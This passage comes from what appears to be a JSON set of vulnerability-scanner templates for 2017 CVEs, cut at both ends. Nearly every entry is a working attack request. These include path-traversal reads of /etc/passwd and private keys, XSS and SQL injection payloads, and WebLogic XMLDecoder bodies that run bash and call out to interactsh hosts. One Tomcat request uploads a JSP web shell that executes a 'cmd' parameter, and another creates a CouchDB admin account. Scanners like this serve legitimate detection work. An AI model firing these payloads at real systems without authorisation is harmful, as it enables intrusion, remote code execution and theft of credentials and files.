Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?oast\\.me(?:\\s*?)$"]}]}]},{"id":"CVE-2017-16877","info":{"name":"Nextjs <2.4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-8229","info":{"name":"Amcrest IP Camera Web Management - Data Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/current_config/Sha1Account1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DevInformation","SerialID"],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5487","info":{"name":"WordPress Core <4.7.1 - Username Enumeration","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/users/","{{BaseURL}}/?rest_route=/wp/v2/users/"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"name\":","\"avatar_urls\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"json","name":"usernames","json":[".[] | .slug",".[].name"],"part":"body"}]}]},{"id":"CVE-2017-10271","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"high"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<soapenv:Envelope\n    xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n    <soapenv:Header>\n        <work:WorkContext\n            xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n            <java version=\"1.4.0\" class=\"java.beans.XMLDecoder\">\n                <void class=\"java.lang.ProcessBuilder\">\n                    <array class=\"java.lang.String\" length=\"3\">\n                        <void index=\"0\">\n                            <string>/bin/bash</string>\n                        </void>\n                        <void index=\"1\">\n                            <string>-c</string>\n                        </void>\n                        <void index=\"2\">\n                            <string>ping -c 1 {{interactsh-url}}</string>\n                        </void>\n                    </array>\n                    <void method=\"start\"/></void>\n            </java>\n        </work:WorkContext>\n    </soapenv:Header>\n    <soapenv:Body/>\n</soapenv:Envelope>\n","POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n  <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n      <soapenv:Header>\n          <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n              <java>\n                  <void class=\"java.lang.Thread\" method=\"currentThread\">\n                      <void method=\"getCurrentWork\">\n                          <void method=\"getResponse\">\n                              <void method=\"getServletOutputStream\">\n                                  <void method=\"flush\"/>\n                              </void>\n                              <void method=\"getWriter\"><void method=\"write\"><string>{{randstr}}</string></void></void>\n                          </void>\n                      </void>\n                  </void>\n              </java>\n          </work:WorkContext>\n      </soapenv:Header>\n      <soapenv:Body/>\n</soapenv:Envelope>\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex(\"<faultstring>java.lang.ProcessBuilder || <faultstring>0\", body)","contains(interactsh_protocol, \"dns\")","status_code == 500"],"condition":"and"},{"type":"dsl","dsl":["body == \"{{randstr}}\"","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-1000170","info":{"name":"WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"],"body":"dir=%2Fetc%2F&onlyFiles=true","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<li class='file ext_passwd'>","<a rel='/passwd'>passwd</a></li>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9506","info":{"name":"Atlassian Jira IconURIServlet - Cross-Site Scripting/Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-11629","info":{"name":"FineCMS <=5.0.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>p\u4e0d\u5b58\u5728"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000486","info":{"name":"Primetek Primefaces 5.x - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\npfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVbBkVHj5xLXXCaFGpOHe704aOkNwaB12Cc3Iq6NmBo%2BQZuqhqtPxdTA%3D%3D\n"],"matchers":[{"type":"word","part":"header","words":["Mogwailabs: CHECKCHECK"]}]}]},{"id":"CVE-2017-15363","info":{"name":"Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<?php","'host'","'database'","'extConf'","'debug'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18024","info":{"name":"AvantFAX 3.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin&password=admin&_submit_check=1&jlbqg<script>alert(\"{{randstr}}\")</script>b7g0x=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(\"{{randstr}}\")</script>","AvantFAX"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7921","info":{"name":"Hikvision - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/deviceInfo?auth=YWRtaW46MTEK"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<firmwareVersion>"]},{"type":"word","part":"header","words":["application/xml"]}]}]},{"id":"CVE-2017-5631","info":{"name":"KMCIS CaseAware - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000029","info":{"name":"Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/resource/file%3a///etc/passwd/"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11444","info":{"name":"Subrion CMS <4.1.5.10 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["projectdiscovery.io"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17562","info":{"name":"Embedthis GoAhead <3.6.5 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"payloads":{"endpoint":["admin","apply","non-CA-rev","cgitest","checkCookie","check_user","chn/liveView","cht/liveView","cnswebserver","config","configure/set_link_neg","configure/swports_adjust","eng/liveView","firmware","getCheckCode","get_status","getmac","getparam","guest/Login","home","htmlmgr","index","index/login","jscript","kvm","liveView","login","login.asp","login/login","login/login-page","login_mgr","luci","main","main-cgi","manage/login","menu","mlogin","netbinary","nobody/Captcha","nobody/VerifyCode","normal_userLogin","otgw","page","rulectl","service","set_new_config","sl_webviewer","ssi","status","sysconf","systemutil","t/out","top","unauth","upload","variable","wanstatu","webcm","webmain","webproc","webscr","webviewLogin","webviewLogin_m64","webviewer","welcome"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["environment variable","display library search paths"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9841","info":{"name":"PHPUnit - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n","GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(phpunit_rce);?>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["6dd70f16549456495373a337e6708865"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14537","info":{"name":"Trixbox 2.8.0 - Path Traversal","severity":"medium"},"requests":[{"raw":["POST /maint/index.php?packages HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{Hostname}}/maint/index.php?packages\nCookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n\nxajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages\n","GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nReferer: {{Hostname}}/maint/index.php?packages\nCookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-15944","info":{"name":"Palo Alto Network PAN-OS - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\";user|s.\"1337\"; HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID={{randstr}};\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["@start@Success@end@"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12583","info":{"name":"DokuWiki - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=<svg%20onload=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unable to parse at parameter \"<svg onload=alert(document.domain)>\".</div>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-0929","info":{"name":"DotNetNuke (DNN) ImageHandler <9.2.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/DnnImageHandler.ashx?mode=file&url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2017-5689","info":{"name":"Intel Active Management - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /hw-sys.htm HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"digest-username":"admin","matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["System Status","Active Management Technology"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7391","info":{"name":"Magmi 0.7.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain);</script><"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-8917","info":{"name":"Joomla! <3.7.1 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2017-7925","info":{"name":"Dahua Security - Configuration File Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/current_config/passwd"],"matchers":[{"type":"dsl","dsl":["contains(to_lower(body), \"ugm\")","contains(to_lower(body), \"id:name:passwd\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","group":1,"regex":["1:(.*:.*):1:CtrPanel"]}]}]},{"id":"CVE-2017-16894","info":{"name":"Laravel <5.5.21 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.env"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["APP_NAME=","APP_DEBUG=","DB_PASSWORD="],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17059","info":{"name":"WordPress amtyThumb Posts 8.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1"],"body":"amty_hidden=1","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-6090","info":{"name":"PhpColl 2.5.1 Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137\n\n-----------------------------154934846911423734231554128137\nContent-Disposition: form-data; name=\"upload\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php echo md5('phpcollab_rce');?>\n\n-----------------------------154934846911423734231554128137--\n","GET /logos_clients/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["48dbd2384cb6b996fa1e2855c7f0567f"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14186","info":{"name":"FortiGate FortiOS SSL VPN Web Portal - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["location=decodeURIComponent(\"javascript%3Aalert%28document.domain%29\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18536","info":{"name":"WordPress Stop User Enumeration <=1.3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17736","info":{"name":"Kentico - Installer Privilege Escalation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/CMSInstall/install.aspx"],"matchers-condition":"or","matchers":[{"type":"word","words":["Kentico","Database Setup","SQLServer"],"condition":"and"},{"type":"word","words":["Database Setup","SQLServer"],"condition":"and"}]}]},{"id":"CVE-2017-17731","info":{"name":"DedeCMS 5.7 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,md5({{num}}),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7269","info":{"name":"Windows Server 2003 & IIS 6.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"OPTIONS","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex(\"<DAV:sql>\", dasl)","regex(\"[\\d]+(,\\s+[\\d]+)?\", dav)","regex(\".*?PROPFIND\", public)","regex(\".*?PROPFIND\", allow)"],"condition":"or"},{"type":"word","part":"header","words":["IIS/6.0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14849","info":{"name":"Node.js <8.6.0 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/../../../a/../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-10075","info":{"name":"Oracle Content Server - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup=&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO","{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","ORACLE_QUERY"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-3506","info":{"name":"Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution","severity":"high"},"requests":[{"raw":["POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,\nContent-Type: text/xml;charset=UTF-8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header>\n    <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n      <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\n        <void id=\"url\" class=\"java.net.URL\">\n          <string>http://{{interactsh-url}}</string>\n        </void>\n        <void idref=\"url\">\n          <void id=\"stream\" method =\"openStream\"/>\n        </void>\n      </java>\n    </work:WorkContext>\n    </soapenv:Header>\n  <soapenv:Body/>\n</soapenv:Envelope>\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-12629","info":{"name":"Apache Solr <= 7.1 - XML Entity Injection","severity":"critical"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\n","GET /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2017-15287","info":{"name":"Dreambox WebControl 2.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"word","words":["Unknown command: <script>alert(document.cookie)</script>"]}]}]},{"id":"CVE-2017-1000163","info":{"name":"Phoenix Framework - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?redirect=/\\interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2017-12615","info":{"name":"Apache Tomcat Servers - Remote Code Execution","severity":"high"},"requests":[{"method":"PUT","path":["{{BaseURL}}/poc.jsp/"],"body":"<%@ page import=\"java.util.*,java.io.*\"%>\n<%\nif (request.getParameter(\"cmd\") != null) {\n        out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");\n        Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n        OutputStream os = p.getOutputStream();\n        InputStream in = p.getInputStream();\n        DataInputStream dis = new DataInputStream(in);\n        String disr = dis.readLine();\n        while ( disr != null ) {\n                out.println(disr);\n                disr = dis.readLine();\n                }\n        }\n%>\n","headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9140","info":{"name":"Reflected XSS - Telerik Reporting Module","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)"],"matchers-condition":"and","matchers":[{"type":"word","words":["#000000\"onload=\"prompt(1)","Telerik.ReportViewer.axd?name=Resources"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17043","info":{"name":"WordPress Emag Marketplace Connector 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000028","info":{"name":"Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd","{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-15647","info":{"name":"FiberHome Routers - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18638","info":{"name":"Graphite <=1.1.5 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-12635","info":{"name":"Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation","severity":"critical"},"requests":[{"raw":["PUT /_users/org.couchdb.user:poc HTTP/1.1\nHost:  {{Hostname}}\nAccept: application/json\n\n{\n  \"type\": \"user\",\n  \"name\": \"poc\",\n  \"roles\": [\"_admin\"],\n  \"roles\": [],\n  \"password\": \"123456\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","Location:"]},{"type":"word","part":"body","words":["org.couchdb.user:poc","conflict","Document update conflict"]},{"type":"status","status":[201,409]}]}]},{"id":"CVE-2017-12544","info":{"name":"HPE System Management - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var prodName = '';prompt`document.domain`;//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9288","info":{"name":"WordPress Raygun4WP <=1.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-10974","info":{"name":"Yaws 1.91 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5C../ssl/yaws-key.pem"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body), \"<html\")"]},{"type":"word","words":["BEGIN RSA PRIVATE KEY"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-15715","info":{"name":"Apache httpd <=2.4.29 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ\n\n------WebKitFormBoundaryKc8fBVDo558U4hbJ\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\n\n{{randstr_1}}\n\n------WebKitFormBoundaryKc8fBVDo558U4hbJ\nContent-Disposition: form-data; name=\"name\"\n\n{{randstr}}.php\\x0A\n------WebKitFormBoundaryKc8fBVDo558U4hbJ--\n","GET 